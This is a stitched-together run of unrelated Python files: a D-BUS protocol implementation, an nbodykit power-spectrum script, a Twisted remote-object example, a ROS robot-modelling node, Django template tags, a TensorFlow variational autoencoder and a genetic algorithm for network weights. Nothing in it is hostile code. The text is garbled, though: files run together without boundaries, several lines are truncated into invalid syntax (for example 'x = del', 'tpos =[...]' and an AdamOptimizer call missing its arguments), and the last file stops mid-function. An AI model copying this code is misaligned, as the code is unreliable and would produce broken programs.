type') if struct.unpack(endian + 'I', header[8:12])[0] == 0: raise ValueError('illegal serial number') harrlen = struct.unpack(endian + 'I', header[12:16])[0] padlen = (8 - harrlen) % 8 bodylen = struct.unpack(endian + 'I', header[4:8])[0] return 16 + harrlen + padlen + bodylen def new_server_guid(): """Return a new GUID for a server.""" return binascii.hexlify(os.urandom(16)).decode('ascii') class DbusProtocol(MessageProtocol): """D-BUS Protocol.""" # According to the D-BUS spec the max message size is 128MB. However since # we want to limited memory usage we are much more conservative here. max_message_size = 128*1024 # Maximum size for an authentication line max_line_size = 1000 _next_unique_name = 0 S_CREDS_BYTE, S_AUTHENTICATE, S_MESSAGE_HEADER, S_MESSAGE = range(4) def __init__(self, message_handler=None, server_side=False, server_guid=None, timeout=None): super(DbusProtocol, self).__init__(message_handler, timeout=timeout) self._server_side = server_side self._name_acquired = Event() self._buffer = bytearray() self._method_calls = {} self._authenticator = None if self._server_side: self._server_guid = server_guid or new_server_guid() self._unique_name = ':{}'.format(self._next_unique_name) type(self)._next_unique_name += 1 else: self._server_guid = None self._unique_name = None self._state = None @property def server_guid(self): return self._server_guid def connection_made(self, transport): # Protocol callback super(DbusProtocol, self).connection_made(transport) # The client initiates by sending a '\0' byte, as per the D-BUS spec. if self._server_side: self._state = self.S_CREDS_BYTE else: self._state = self.S_AUTHENTICATE self._transport.write(b'\0') self._writer = Stream(transport, 'w') self._authenticator = TxdbusAuthenticator(transport, self._server_side, self._server_guid) self._message_size = 0 def connection_lost(self, exc): # Protocol callback super(DbusProtocol, self).connection_lost(exc) if self._error is None: self._error = TransportError('connection lost') for notify in self._method_calls.values(): if isinstance(notify, switch_back): notify.throw(self._error) self._method_calls.clear() self._name_acquired.set() self._authenticator = None # break cycle def on_creds_byte(self, byte): if byte != 0: self._error = DbusError('first byte needs to be zero') return False self._state = self.S_AUTHENTICATE return True def on_partial_auth_line(self, line): if len(line) > self.max_line_size: self._error = DbusError('auth line too long ({} bytes)'.format(len(line))) return False return True def on_auth_line(self, line): if not self.on_partial_auth_line(line): return False if line[-2:] != b'\r\n': self._error = DbusError('auth line does not end with \\r\\n') return False try: line = codecs.decode(line[:-2], 'ascii') # codecs.decode allows memoryview except UnicodeDecodeError as e: self._error = DbusError('auth line contain non-ascii chars') return False try: self._authenticator.handleAuthMessage(line) except txdbus.DBusAuthenticationFailed as e: self._error = DbusError('authentication failed: {!s}'.format(e)) return False if self._authenticator.authenticationSucceeded(): if not self._server_side: message = txdbus.MethodCallMessage('/org/freedesktop/DBus', 'Hello', 'org.freedesktop.DBus', 'org.freedesktop.DBus') self._transport.write(message.rawMessage) self._method_calls[message.serial] = self.on_hello_response self._state = self.S_MESSAGE_HEADER self._server_guid = self._authenticator.getGUID() return True def on_hello_response(self, message): self._unique_name = message.body[0] self._name_acquired.set() def on_message_header(self, header): try: size = parse_dbus_header(header) except ValueError: self._error = DbusError('invalid message header') return False if size > self.max_message_size: self._error = DbusError('message too large ({} bytes)'.format(size)) return False self._message_size = size self._state = self.S_MESSAGE return True def on_message(self, message): try: parsed = txdbus.parseMessage(message) except (txdbus.MarshallingError, struct.error) as e: self._error = DbusError('parseMessage() error: {!s}'.format(e)) return False if self._server_side and not self._name_acquired.is_set(): if isinstance(parsed, txdbus.MethodCallMessage) \ and parsed.member == 'Hello' \ and parsed.path == '/org/freedesktop/DBus' \ and parsed.interface == 'org.freedesktop.DBus' \ and parsed.destination == 'org.freedesktop.DBus': response = txdbus.MethodReturnMessage(parsed.serial, signature='s', body=[self._unique_name]) self._name_acquired.set() self._transport.write(response.rawMessage) else: self._error = DbusError('Hello method not called') return False elif isinstance(parsed, (txdbus.MethodReturnMessage, txdbus.ErrorMessage)) \ and getattr(parsed, 'reply_serial', 0) in self._method_calls: notify = self._method_calls.pop(parsed.reply_serial) notify(parsed) elif self._dispatcher: self._queue.put_nowait(parsed) else: mtype = type(parsed).__name__[:-7].lower() info = ' {!r}'.format(getattr(parsed, 'member', getattr(parsed, 'error_name', ''))) self._log.warning('no handler, ignoring inbound {}{}', mtype, info) self._state = self.S_MESSAGE_HEADER return True def prepend_buffer(self, buf): if self._buffer: self._buffer.extend(buf) buf = self._buffer self._buffer = bytearray() return memoryview(buf) def data_received(self, data): view = memoryview(data) offset = 0 while offset != len(data): if self._state == self.S_CREDS_BYTE: credsbyte = six.indexbytes(view, offset) offset += 1 if not self.on_creds_byte(credsbyte): break if self._state == self.S_AUTHENTICATE: pos = data.find(b'\n', offset) if pos == -1: self._buffer.extend(view[offset:]) self.on_partial_auth_line(self._buffer) break line = self.prepend_buffer(view[offset:pos+1]) offset = pos+1 if not self.on_auth_line(line): break if self._state == self.S_MESSAGE_HEADER: needbytes = 16 - len(self._buffer) if len(data) - offset < needbytes: self._buffer.extend(view[offset:]) break header = self.prepend_buffer(view[offset:offset+needbytes]) if not self.on_message_header(header): break offset += len(header) self._buffer.extend(header) if self._state == self.S_MESSAGE: needbytes = self._message_size - len(self._buffer) if len(data) - offset < needbytes: self._buffer.extend(view[offset:]) break message = self.prepend_buffer(view[offset:offset+needbytes]) offset += needbytes if not self.on_message(message): break self._maybe_pause_transport() if self._error: self._transport.close() return @switchpoint def get_unique_name(self): """Return the unique name of the D-BUS connection.""" self._name_acquired.wait() if self._error: raise compat.saved_exc(self._error) elif self._transport is None: raise DbusError('not connected') return self._unique_name @switchpoint def send_message(self, message): """Send a D-BUS message. The *message* argument must be ``gruvi.txdbus.DbusMessage`` instance. """ if not isinstance(message, txdbus.DbusMessage): raise TypeError('message: expecting DbusMessage instance (got {!r})', type(message).__name__) self._name_acquired.wait() if self._error: raise compat.saved_exc(self._error) elif self._transport is None: raise DbusError('not connected') self._writer.write(message.rawMessage) @switchpoint def call_method(self, service, path, interface, method, signature=None, args=None, no_reply=False, auto_start=False, timeout=-1): """Call a D-BUS method and wait for its reply. This method calls the D-BUS method with name *method* that resides on the object at bus address *service*, at path *path*, on interface *interface*. The *signature* and *args* are optional arguments that can be used to add parameters to the method call. The signature is a D-BUS signature string, while *args* must be a sequence of python types that can be converted into the types specified by the signature. See the `D-BUS specification <>`_ for a reference on signature strings. The flags *no_reply* and *auto_start* control the NO_REPLY_EXPECTED and NO_AUTO_START flags on the D-BUS message. The return value is the result of the D-BUS method call. This will be a possibly empty sequence of values. """ message = txdbus.MethodCallMessage(path, method, interface=interface, destination=service, signature=signature, body=args, expectReply=not no_reply, autoStart=auto_start) serial = message.serial if timeout == -1: timeout = self._timeout try: with switch_back(timeout) as switcher: self._method_calls[serial] = switcher self.send_message(message) args, _ = self._hub.switch() finally: self._method_calls.pop(serial, None) response = args[0] assert response.reply_serial == serial if isinstance(response, txdbus.ErrorMessage): raise DbusMethodCallError(method, response) args = tuple(response.body) if response.body else () return args class DbusClient(Client): """A D-BUS client.""" def __init__(self, message_handler=None, timeout=30): """ The *message_handler* argument specifies an optional message handler. The optional *timeout* argument specifies a default timeout for protocol operations in seconds. """ protocol_factory = functools.partial(DbusProtocol, message_handler) super(DbusClient, self).__init__(protocol_factory, timeout) @switchpoint def connect(self, address='session'): """Connect to *address* and wait until the connection is established. The *address* argument must be a D-BUS server address, in the format described in the D-BUS specification. It may also be one of the special addresses ``'session'`` or ``'system'``, to connect to the D-BUS session and system bus, respectively. """ if isinstance(address, six.string_types): addresses = parse_dbus_address(address) else: addresses = [address] for addr in addresses: try: super(DbusClient, self).connect(addr) except pyuv.error.UVError: continue break else: raise DbusError('could not connect to any address') # Wait for authentication to complete self.get_unique_name() protocol = Client.protocol delegate_method(protocol, DbusProtocol.get_unique_name) delegate_method(protocol, DbusProtocol.send_message) delegate_method(protocol, DbusProtocol.call_method) class DbusServer(Server): """A D-BUS server.""" def __init__(self, message_handler, timeout=30): """ The *message_handler* argument specifies the message handler. The optional *timeout* argument specifies a default timeout for protocol operations in seconds. """ protocol_factory = functools.partial(DbusProtocol, message_handler, server_side=True) super(DbusServer, self).__init__(protocol_factory, timeout) @switchpoint def listen(self, address='session'): """Start listening on *address* for new connection. The *address* argument must be a D-BUS server address, in the format described in the D-BUS specification. It may also be one of the special addresses ``'session'`` or ``'system'``, to connect to the D-BUS session and system bus, respectively. """ if isinstance(address, six.string_types): addresses = parse_dbus_address(address) else: addresses = [address] for addr in addresses: try: super(DbusServer, self).listen(addr) except pyuv.error.UVError: self._log.error('skipping address {}', saddr(addr))
from sys import argv from sys import stdout from sys import stderr import logging from argparse import ArgumentParser parser = ArgumentParser("Parallel Cross Power Spectrum Calculator", description= """Calculating cross matter power spectrum from two RunPB input files. Output is written to stdout, in Mpc/h units. PowerSpectrum is the true one, without (2 pi) ** 3 factor. (differ from Gadget/NGenIC internal) """, epilog= """ This script is written by Yu Feng, as part of `nbodykit'. The author would like thank Marcel Schmittfull for the explanation on cic, shotnoise, and k==0 plane errors. """ ) parser.add_argument("filename1", help='basename of the input, only runpb format is supported in this script') parser.add_argument("filename2", help='basename of the input, only runpb format is supported in this script') parser.add_argument("BoxSize", type=float, help='BoxSize in Mpc/h') parser.add_argument("Nmesh", type=int, help='size of calculation mesh, recommend 2 * Ngrid') parser.add_argument("output", help='write power to this file') parser.add_argument("--binshift", type=float, default=0.0, help='Shift the bin center by this fraction of the bin width. Default is 0.0. Marcel uses 0.5. this shall rarely be changed.' ) parser.add_argument("--bunchsize", type=int, default=1024*1024*4, help='Number of particles to read per rank. A larger number usually means faster IO, but less memory for the FFT mesh') parser.add_argument("--remove-cic", default='anisotropic', choices=["anisotropic","isotropic", "none"], help='deconvolve cic, anisotropic is the proper way, see') ns = parser.parse_args() logging.basicConfig(level=logging.DEBUG) import numpy import nbodykit from nbodykit.files import TPMSnapshotFile, read from nbodykit.measurepower import measurepower from pypm.particlemesh import ParticleMesh from pypm.transfer import TransferFunction from mpi4py import MPI def paint_darkmatter(pm, filename, fileformat): pm.real[:] = 0 Ntot = 0 for round, P in enumerate(read(pm.comm, filename, TPMSnapshotFile, columns=['Position'], bunchsize=ns.bunchsize)): P['Position'] *= ns.BoxSize layout = pm.decompose(P['Position']) tpos =['Position']) #print tpos.shape pm.paint(tpos) npaint = pm.comm.allreduce(len(tpos), op=MPI.SUM) nread = pm.comm.allreduce(len(P['Position']), op=MPI.SUM) if pm.comm.rank == 0:'round %d, npaint %d, nread %d' % (round, npaint, nread)) Ntot = Ntot + nread return Ntot def main(): if MPI.COMM_WORLD.rank == 0: print 'importing done' pm = ParticleMesh(ns.BoxSize, ns.Nmesh, dtype='f4') Ntot = paint_darkmatter(pm, ns.filename1, TPMSnapshotFile) if MPI.COMM_WORLD.rank == 0: print 'painting done' pm.r2c() if MPI.COMM_WORLD.rank == 0: print 'r2c done' complex = pm.complex.copy() numpy.conjugate(complex, out=complex) Ntot = paint_darkmatter(pm, ns.filename2, TPMSnapshotFile) if MPI.COMM_WORLD.rank == 0: print 'painting 2 done' pm.r2c() if MPI.COMM_WORLD.rank == 0: print 'r2c 2 done' complex *= pm.complex complex **= 0.5 if MPI.COMM_WORLD.rank == 0: print 'cross done' k, p = measurepower(pm, complex, ns.binshift, ns.remove_cic, 0) if MPI.COMM_WORLD.rank == 0: print 'measure' if pm.comm.rank == 0: if ns.output != '-': myout = open(ns.output, 'w') else: myout = stdout numpy.savetxt(myout, zip(k, p), '%0.7g') myout.flush() main()
#!/usr/bin/env python # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. from twisted.spread import pb from twisted.internet import reactor def main(): rootobj_def = pb.getObjectAt("localhost", 8800, 30) rootobj_def.addCallbacks(got_rootobj) obj2_def = getSomeObjectAt("localhost", 8800, 30, "two") obj2_def.addCallbacks(got_obj2) obj3_def = getSomeObjectAt("localhost", 8800, 30, "three") obj3_def.addCallbacks(got_obj3) def got_rootobj(rootobj): print "got root object:", rootobj print "telling root object to do foo(A)" rootobj.callRemote("foo", "A") def got_obj2(obj2): print "got second object:", obj2 print "telling second object to do foo(B)" obj2.callRemote("foo", "B") def got_obj3(obj3): print "got third object:", obj3 print "telling third object to do foo(C)" obj3.callRemote("foo", "C") class my_ObjectRetrieval(pb._ObjectRetrieval): def __init__(self, broker, d, objname): pb._ObjectRetrieval.__init__(self, broker, d) self.objname = objname def connectionMade(self): assert not self.term, "How did this get called?" x = del self.term = 1 self.deferred.callback(x) def getSomeObjectAt(host, port, timeout=None, objname="root"): from twisted.internet import defer from twisted.spread.pb import Broker, BrokerClientFactory d = defer.Deferred() b = Broker(1) bf = BrokerClientFactory(b) my_ObjectRetrieval(b, d, objname) if host == "unix": # every time you use this, God kills a kitten reactor.connectUNIX(port, bf, timeout) else: reactor.connectTCP(host, port, bf, timeout) return d main()
#!/usr/bin/env python #coding: utf-8 import sys import time import rospy import json from std_msgs.msg import String, Empty, Float64 from mutualModelling.agent2 import Agent # this node udate models of agents (by the robot) and publishes the choice of action by the robot: #------------------------------------------------------------------------------------------------- pub_robot_action = rospy.Publisher('robot_action_topic', String, queue_size=1) # create a mutual modeller agent "robot" that also model an agent "human" in cowriter: #------------------------------------------------------------------------------------- ROBOT_NAME = "Mimi" HUMAN_NAME = "Child" ALL_NAMES = [ROBOT_NAME, HUMAN_NAME] robot_percepts = ["child_progress","reward","punish","justified_reward","justified_punish","justified_new_word","with_me"] robot_actions = ["converges","diverges","exaggerates","looks_tablet","looks_child_head","looks_out","looks_experimentator","looks_selection_tablet","points_tablet"] robot_rewards = [["justified_reward",1.,1.],["justified_punish",1.,1],["with_me",1.,1.],["with_me",-1.,-1.],["child_progress",1.,1.],["justified_new_word",1.,1.]] #robot_instincts = [[HUMAN_NAME+"_looks_robot_head",1.,"looks_child_head"],[HUMAN_NAME+"_looks_robot_head",1.,"looks_tablet"], [HUMAN_NAME+"_looks_tablet",1.,"looks_child_head"],[HUMAN_NAME+"_looks_tablet",1.,"looks_tablet"], [HUMAN_NAME+"_looks_noise",1.,"looks_child_head"],[HUMAN_NAME+"_looks_noise",1.,"mimics"], [HUMAN_NAME+"_looks_selection_tablet",1.,"looks_selection_tablet"], [HUMAN_NAME+"_looks_experimentator",1.,"looks_experimentator"]] #robot = Agent(ROBOT_NAME,ALL_NAMES,robot_percepts,robot_actions,robot_rewards,robot_instincts) robot = Agent(ROBOT_NAME,ALL_NAMES,robot_percepts,robot_actions,robot_rewards) # the point of attention of the human is used to define what action of the robot is observed by the child: #--------------------------------------------------------------------------------------------------------- objects = {"experimentator","selection_tablet","tablet","robot_head","out"} human_attention = "" # what the human can perceive about robot actions given his point of attention: visible_for_human_from = {"tablet":["converges","diverges"], "robot_head":["looks_tablet","looks_child_head","looks_out","points_tablet","looks_experimentator"]} # what the robot is expected to perceive about human action given robot's attention: # (the robot is not expected (by the child) to differentiate justified/unjustified behavior of the child) visible_for_robot_from = {"tablet":["punishes","rewards","sends_demo"],"selection_tablet":["sends_new_word"], "child_head":["looks_tablet","looks_robot_head","looks_out","looks_experimentator"]} # when an agent do/observe something the mutual models (by the robot) are updated: #--------------------------------------------------------------------------------- models_percepts = {} models_actions = {} human_target = "_" robot_target = "_" last_info = "" def onChangeRobotTarget(msg): global robot_target robot_target = str( def onChangeHumanTarget(msg): global human_target human_target = str( def onChangeHumanWMN(msg): global last_info delta_wmn = if last_info!=str(delta_wmn): models_percepts.setdefault(ROBOT_NAME,[]).append(("with_me",delta_wmn)) makeDecision() last_info = str(delta_wmn) def onRobotAction(msg): global models_actions global models_percepts global last_info action = str( if last_info!=action: if human_target in visible_for_human_from: if action in visible_for_human_from[human_target]: models_actions[HUMAN_NAME+':'+ROBOT_NAME] = action models_percepts.setdefault(HUMAN_NAME,[]).append((ROBOT_NAME+"_"+action,1.)) rospy.loginfo(ROBOT_NAME+"_"+action) rospy.loginfo(".........................................") makeDecision() last_info=action def onHumanAction(msg): global models_actions global models_percepts global last_info action = str( if last_info!=action: models_actions[HUMAN_NAME] = action models_percepts.setdefault(ROBOT_NAME,[]).append((HUMAN_NAME+'_'+action,1.)) rospy.loginfo(HUMAN_NAME+'_'+action) rospy.loginfo("////////////////////////////////////////") if robot_target in visible_for_robot_from: if action in visible_for_robot_from[robot_target]: models_percepts.setdefault(HUMAN_NAME+':'+ROBOT_NAME,[]).append((HUMAN_NAME+"_"+action,1.)) makeDecision() last_info=action def makeDecision(): global robot global models_actions global models_percepts new_robot_action = None if models_actions: new_robot_action = robot.update_models(None,models_percepts,models_actions) rospy.loginfo(models_percepts) rospy.loginfo(models_actions) #rospy.loginfo(test) rospy.loginfo("----------------------------------------") if new_robot_action: msg = String() = new_robot_action pub_robot_action.publish(msg) models_percepts = {} models_actions = {} rospy.sleep(1.0) # TODO: """ def onRobotObs(msg): def onHumanObs(msg): """ if __name__=='__main__': rospy.init_node("cowriter_mutual_modelling") while(True): rospy.Subscriber('robot_action_topic', String, onRobotAction ) rospy.Subscriber('human_action_topic', String, onHumanAction) rospy.Subscriber('robot_target_topic', String, onChangeRobotTarget) rospy.Subscriber('human_target_topic', String, onChangeHumanTarget) rospy.Subscriber('human_wmn_topic', Float64, onChangeHumanWMN) #rospy.Subscriber('robot_obs_topic', String, onRobotObs) #rospy.Subscriber('human_obs_topic', String, onHumanObs) rospy.sleep(1.0) rospy.spin()
from markdown import markdown from django import template from django.utils.safestring import mark_safe register = template.Library() # # Filters # @register.filter() def oneline(value): """ Replace each line break with a single space """ return value.replace('\n', ' ') @register.filter() def getlist(value, arg): """ Return all values of a QueryDict key """ return value.getlist(arg) @register.filter(is_safe=True) def gfm(value): """ Render text as GitHub-Flavored Markdown """ html = markdown(value, extensions=['mdx_gfm']) return mark_safe(html) @register.filter() def startswith(value, arg): """ Test whether a string starts with the given argument """ return str(value).startswith(arg) @register.filter() def user_can_add(model, user): perm_name = '{}:add_{}'.format(model._meta.app_label, model.__class__.__name__.lower()) return user.has_perm(perm_name) @register.filter() def user_can_change(model, user): perm_name = '{}:change_{}'.format(model._meta.app_label, model.__class__.__name__.lower()) return user.has_perm(perm_name) @register.filter() def user_can_delete(model, user): perm_name = '{}:delete_{}'.format(model._meta.app_label, model.__class__.__name__.lower()) return user.has_perm(perm_name) # # Tags # @register.simple_tag() def querystring_toggle(request, multi=True, page_key='page', **kwargs): """ Add or remove a parameter in the HTTP GET query string """ new_querydict = request.GET.copy() # Remove page number from querystring try: new_querydict.pop(page_key) except KeyError: pass # Add/toggle parameters for k, v in kwargs.items(): values = new_querydict.getlist(k) if k in new_querydict and v in values: values.remove(v) new_querydict.setlist(k, values) elif not multi: new_querydict[k] = v else: new_querydict.update({k: v}) querystring = new_querydict.urlencode() if querystring: return '?' + querystring else: return '' @register.inclusion_tag('utilities/templatetags/utilization_graph.html') def utilization_graph(utilization, warning_threshold=75, danger_threshold=90): """ Display a horizontal bar graph indicating a percentage of utilization. """ return { 'utilization': utilization, 'warning_threshold': warning_threshold, 'danger_threshold': danger_threshold, }
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #!/usr/bin/env python """Variational autoencoder. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import math from absl import app from absl import flags import tensorflow as tf from lib import data, layers, train, utils, classifiers FLAGS = flags.FLAGS class VAE(train.AE): def model(self, latent, depth, scales, beta): x = tf.placeholder(tf.float32, [None, self.height, self.width, self.colors], 'x') l = tf.placeholder(tf.float32, [None, self.nclass], 'label') h = tf.placeholder( tf.float32, [None, self.height >> scales, self.width >> scales, latent], 'h') def encoder(x): return layers.encoder(x, scales, depth, latent, 'ae_enc') def decoder(h): return layers.decoder(h, scales, depth, self.colors, 'ae_dec') encode = encoder(x) with tf.variable_scope('ae_latent'): encode_shape = tf.shape(encode) encode_flat = tf.layers.flatten(encode) latent_dim = encode_flat.get_shape()[-1] q_mu = tf.layers.dense(encode_flat, latent_dim) log_q_sigma_sq = tf.layers.dense(encode_flat, latent_dim) q_sigma = tf.sqrt(tf.exp(log_q_sigma_sq)) q_z = tf.distributions.Normal(loc=q_mu, scale=q_sigma) q_z_sample = q_z.sample() q_z_sample_reshaped = tf.reshape(q_z_sample, encode_shape) p_x_given_z_logits = decoder(q_z_sample_reshaped) p_x_given_z = tf.distributions.Bernoulli(logits=p_x_given_z_logits) ae = 2*tf.nn.sigmoid(p_x_given_z_logits) - 1 decode = 2*tf.nn.sigmoid(decoder(h)) - 1 loss_kl = 0.5*tf.reduce_sum( -log_q_sigma_sq - 1 + tf.exp(log_q_sigma_sq) + q_mu**2) loss_kl = loss_kl/tf.to_float(tf.shape(x)[0]) x_bernoulli = 0.5*(x + 1) loss_ll = tf.reduce_sum(p_x_given_z.log_prob(x_bernoulli)) loss_ll = loss_ll/tf.to_float(tf.shape(x)[0]) elbo = loss_ll - beta*loss_kl utils.HookReport.log_tensor(loss_kl, 'loss_kl') utils.HookReport.log_tensor(loss_ll, 'loss_ll') utils.HookReport.log_tensor(elbo, 'elbo') xops = classifiers.single_layer_classifier( tf.stop_gradient(encode), l, self.nclass) xloss = tf.reduce_mean(xops.loss) utils.HookReport.log_tensor(xloss, 'classify_latent') update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) ae_vars = tf.global_variables('ae_') xl_vars = tf.global_variables('single_layer_classifier') with tf.control_dependencies(update_ops): train_ae = tf.train.AdamOptimizer( -elbo, var_list=ae_vars) train_xl = tf.train.AdamOptimizer( xloss, tf.train.get_global_step(), var_list=xl_vars) ops = train.AEOps(x, h, l, q_z_sample_reshaped, decode, ae,, train_xl), classify_latent=xops.output) n_interpolations = 16 n_images_per_interpolation = 16 def gen_images(): return self.make_sample_grid_and_save( ops, interpolation=n_interpolations, height=n_images_per_interpolation) recon, inter, slerp, samples = tf.py_func( gen_images, [], [tf.float32]*4) tf.summary.image('reconstruction', tf.expand_dims(recon, 0)) tf.summary.image('interpolation', tf.expand_dims(inter, 0)) tf.summary.image('slerp', tf.expand_dims(slerp, 0)) tf.summary.image('samples', tf.expand_dims(samples, 0)) return ops def main(argv): del argv # Unused. batch = FLAGS.batch dataset = data.get_dataset(FLAGS.dataset, dict(batch_size=batch)) scales = int(round(math.log(dataset.width // FLAGS.latent_width, 2))) model = VAE( dataset, FLAGS.train_dir, latent=FLAGS.latent, depth=FLAGS.depth, scales=scales, beta=FLAGS.beta) model.train() if __name__ == '__main__': flags.DEFINE_integer('depth', 64, 'Depth of first for convolution.') flags.DEFINE_integer( 'latent', 16, 'Latent space depth, the total latent size is the depth multiplied by ' 'latent_width ** 2.') flags.DEFINE_integer('latent_width', 4, 'Width of the latent space.') flags.DEFINE_float('beta', 1.0, 'ELBO KL term scale.')
#!/usr/bin/env python # Copyright (c) 2012, Nick Harvey # All rights reserved. # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # - Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # - Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # - Neither the name of the <ORGANIZATION> nor the names of its contributors # may be used to endorse or promote products derived from this software # without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. import Matrix, random, copy, sys class ga: def __init__(self): self.population = [] self.coeff_size = 0 def seedGA(self, size, inSize, hiddenSize, outSize): 'Creates a new set of matrices for the neural network' self.size = size self.inSize = inSize self.hiddenSize = hiddenSize self.outSize = outSize self.coeff_size = (inSize * hiddenSize) + hiddenSize + (hiddenSize * outSize) + outSize for i in range(size): matrices = {} matrices["first_weights"] = self.getWeights(inSize, hiddenSize) matrices["first_thresholds"] = self.getThresholds(hiddenSize) matrices["second_weights"] = self.getWeights(hiddenSize, outSize) matrices["second_thresholds"] = self.getThresholds(outSize) self.population.append(matrices) def getInputSize(self): return self.inSize def getHiddenSize(self): return self.hiddenSize def getOutputSize(self): return self.outSize def setGA2(self, population): self.population = population self.size = len(self.population) def setGA(self, population): self.population = population self.size = len(self.population) temp = population[0] self.inSize = temp["first_weights"].getWidth() self.hiddenSize = temp["first_thresholds"].getHeight() self.outSize = temp["second_weights"].getHeight() self.coeff_size = (self.inSize * self.hiddenSize) + self.hiddenSize + (self.hiddenSize * self.outSize) + self.outSize def getWeights(self, width, height): m = Matrix.Matrix() m.setWidth(width) m.setHeight(height) m.randomFill(0, 1) return m def getThresholds(self, height): m = Matrix.Matrix() m.setHeight(height) m.randomFill(0, 2) return m def getPopulation(self): return self.population def mateParents(self, firstParentId, secondParentId, intest=False): '''Takes the ids of two chromozones, picks a crossover point and then takes the first part of chromozone one, before the crossover location and joins it with the second part of chromozone two, after the crossover location. It then does the opposite with the first part of chromozone two and the second part of chromozone one.''' parent1 = self.population[firstParentId] parent2 = self.population[secondParentId] selector = int(random.random() * self.coeff_size) children = [parent1.copy(), parent2.copy()] crossover_index = 0 if intest: print("Mating parents:", selector) # print("selector:", selector, self.coeff_size) if selector < (self.inSize * self.hiddenSize): selector_row = int(selector/self.inSize) selector_col = selector % self.inSize crossover_loc = "first_weights" crossover_index = 0 # print("Crossing first weights", selector, selector_row, selector_col) else: # child["first_weights"] = parent1["first_weights"].copy() selector = selector - (self.inSize * self.hiddenSize) if selector < self.hiddenSize: selector_row = selector selector_col = 0 crossover_loc = "first_thresholds" crossover_index = 1 # print("Crossing first thresholds", selector, selector_row, selector_col) else: # child["first_thresholds"] = parent1["first_thresholds"].copy() selector = selector - (self.hiddenSize) if selector < (self.hiddenSize * self.outSize): selector_row = int(selector/self.hiddenSize) selector_col = selector % self.hiddenSize crossover_loc = "second_weights" crossover_index = 2 # print("Crossing second weights", selector, selector_row, selector_col) else: # child["second_weights"] = parent1["second_weights"].copy() selector = selector - (self.hiddenSize * self.outSize) selector_row = selector selector_col = 0 crossover_loc = "second_thresholds" crossover_index = 3 # print("Crossing second thresholds", selector, selector_row, selector_col) if intest: print("Crossover location:", crossover_loc) children[0][crossover_loc] = self.crossOver(parent1[crossover_loc], parent2[crossover_loc], selector_row, selector_col) children[1][crossover_loc] = self.crossOver(parent2[crossover_loc], parent1[crossover_loc], selector_row, selector_col) ## then merge the remaining matrices into the new chromozone if crossover_index < 1: children[0]['first_thresholds'] = copy.deepcopy(parent2['first_thresholds']) children[1]['first_thresholds'] = copy.deepcopy(parent1['first_thresholds']) if crossover_index < 2: children[0]['second_weights'] = copy.deepcopy(parent2['second_weights']) children[1]['second_weights'] = copy.deepcopy(parent1['second_weights']) if crossover_index < 3: children[0]['second_thresholds'] = copy.deepcopy(parent2['second_thresholds']) children[1]['second_thresholds'] = copy.deepcopy(parent1['second_thresholds']) return children def crossOver(self, parent_one, parent_two, row, col, intest=False): """crossover determines which chromozones progress to the next population""" rows = parent_one.getHeight() cols = parent_one.getWidth() cross = row*rows + col m = Matrix.Matrix().setWidth(cols).setHeight(rows).init() for i in range(rows): for j in range(cols): if (i*rows+j) < cross: m.setElem(i, j, parent_one.getElem(i, j)) else: m.setElem(i, j, parent_two.getElem(i, j)) return m def mutatePopulation(self, survivors, mutationRate, crossOver): '''Mutates a population of chromozones. There are number of approaches to achieving this. This approach uses a primary random number in the range (0..3) to select which of the 4 matrices in the ANN to mutate. Once it has picked which one, it uses a second random number in the range (0..number_of_elements) to choose which value to change. This is simplistic, in comparison with another algorithm, which biases the probability by the size of the matrix. This approach causes mutations on the smaller matrices much more frequently.''' newPopulation = [] mutations = [0 for i in range(4)] for matrices in survivors: # matrices = self.population[s] if random.random() < mutationRate: matrixToMutate = int(random.random() * 4) print("Mutating", str(matrixToMutate)) # selector refers to the first weights matrix ([ INPUT x HIDDEN ]) if matrixToMutate == 0: selector_col = int(random.random() * self.inSize) selector_row = int(random.random() * self.hiddenSize) matrices["first_weights"].setElem(selector_row, selector_col, random.random()) mutations[0] += 1 # selector refers to the first thresholds matrix elif matrixToMutate == 1: selector = int(random.random() * self.hiddenSize) currVal = matrices["first_thresholds"].getElem(selector, 0) currVal += (0.1 - random.random()*0.2) if currVal > 2: currVal = 2 elif currVal < 0: currVal = 0 matrices["first_thresholds"].setElem(selector, 0, currVal) mutations[1] += 1 # print("Mutation in first threshold", selector) # selector refers to the second weights matrix ([ HIDDEN x OUTPUT ]) elif matrixToMutate == 2: selector_col = int(random.random() * self.hiddenSize) selector_row = int(random.random() * self.outSize) matrices["second_weights"].setElem(selector_row, selector_col, random.random()) mutations[2] += 1 # print("Mutation in second matrix", selector, selector_row, selector_col) # selector refers to the second thresholds elif matrixToMutate == 3: selector = int(random.random() * self.outSize) currVal = matrices["second_thresholds"].getElem(selector, 0) currVal += (0.1 - random.random()*0.2) if currVal > 2: currVal = 2 elif currVal < 0: currVal = 0 matrices["second_thresholds"].setElem(selector, 0, currVal) mutations[3] += 1 